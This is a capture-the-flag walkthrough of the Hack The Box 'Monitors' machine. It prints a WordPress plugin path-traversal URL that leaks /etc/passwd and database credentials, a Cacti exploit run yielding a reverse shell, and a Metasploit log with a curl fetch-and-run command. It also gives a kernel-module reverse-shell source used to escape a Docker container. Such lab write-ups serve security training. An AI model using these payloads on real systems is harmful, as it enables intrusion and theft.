Nmap
WPScan
Exploitation
Post exploitation: www-data to marcus
Enumeration
Post exploitation: marcus to root
Enumeration
Welcome to the Monitors writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Monitors
tags: HTB
Hard
Linux
Platform: Hackthebox
Difficult: Hard
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.238
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:43 EDT
Nmap scan report for 10.10.10.238
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 55.04 seconds
Now that we know the open ports, let's scan them in depth.
$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p22,80 10.10.10.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 13:45 EDT
Nmap scan report for 10.10.10.238
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn´t have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
When we access the web of port 80 we see that we have restricted access. In order to access, he tells us to contact admin@monitors.htb
. If we add monitors.htb we can access the website with the url http://monitors.htb/
.
Sorry, direct IP access is not allowed.
If you are having issues accessing the site then contact the website administrator: admin@monitors.htb
WPScan
$ wpscan --url http://monitors.htb/ -e ap,u,cb
[i] Plugin(s) Identified:
[+] wp-with-spritz
| Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
Looking for vulnerabilities for the plugin version we can find an LFI / RFI in this link.
Exploitation
Using this URL http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd we can get the /etc/passwd
content.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
Taking advantage of the LFI vulnerability we can read the wordpress wp-config.php
file in search of the MySQL credentials.
view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
Looking inside http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf
we can find another domain name cacti-admin.monitors.htb
.
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
Inside this domain we find a login form. We can login using admin:BestAdministrator@2020!
credentials.
Now, we can use this exploit to get shell. We put a terminal to listen and execute the exploit.
$ python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.14.29 --lport 8787
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
[+] Trying to log in...
[+] Successfully logged in!
[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"
[+] Check your nc listener!
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 36118
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Post exploitation: www-data to marcus
Enumeration
Now, looking for the name of the subdomain cacti
in the system we can find other credentials.
www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
[...]
/etc/systemd/system/cacti-backup.service
[...]
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
[...]
ExecStart=/home/marcus/.backup/backup.sh
[...]
www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
And now we only need to do su marcus
using the password VerticalEdge2020
and read the user flag.
www-data@monitors:/home/marcus/.backup$ su marcus
Password:
marcus@monitors:~/.backup$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~/.backup$ cd
marcus@monitors:~$ cat user.txt
CENSORED_FLAG
marcus@monitors:~$
Post exploitation: marcus to root
Enumeration
Looking at the output of the netstat
command we can see that there is a port 8443
listening locally.
marcus@monitors:~$ netstat -putona
[...]
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN - off (0.00/0/0)
[...]
We are going to redirect the port traffic to our machine doing Port Fordwarding via SSH.
$ ssh -L localhost:8443:localhost:8443 marcus@monitors.htb
Accessing port 8443 with HTTPS a Tomcat error appears with its version. Googling the version of Tomcat 9.0.31
we can find this vulnerability.
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 10.10.14.29
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 8888
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options
Module options (exploit/linux/http/apache_ofbiz_deserialiation):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.29 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
[*] Started reverse TCP handler on 10.10.14.29:8888
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/re6R4gMz4969w
[*] Local IP: http://23.6.17.150:8080/re6R4gMz4969w
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS}http://10.10.14.29:8080/re6R4gMz4969w;chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
[*] Client 10.10.10.238 (curl/7.64.0) requested /re6R4gMz4969w
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Command Stager progress - 103.95% done (158/152 bytes)
[*] Sending stage (36 bytes) to 10.10.10.238
[*] Command shell session 1 opened (10.10.14.29:8888 -> 10.10.10.238:41252) at 2021-07-25 18:54:45 +0200
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
And we are root but, we are inside a docker container.
If we list the capabilities with cpash --print
we can see that cap_sys_module
is available.
Searching the internet we can find this POC with which to escape the container and be root.
reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.29/8787 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Makefile
obj-m +=reverse-shell.o
all:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
clean:
make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean
root@fb6c348eae64:/# make
make -C /lib/modules/4.15.0-142-generic/build M=/ modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] //reverse-shell.o
Building modules, stage 2.
MODPOST 1 modules
CC /reverse-shell.mod.o
LD [M] /reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
We put the terminal to listen and execute.
root@fb6c348eae64:/# insmod reverse-shell.ko
And now, we are root and we can read his flag!.
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.238] 49874
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# cat /root/root.txt
cat /root/root.txt
CENSORED_FLAG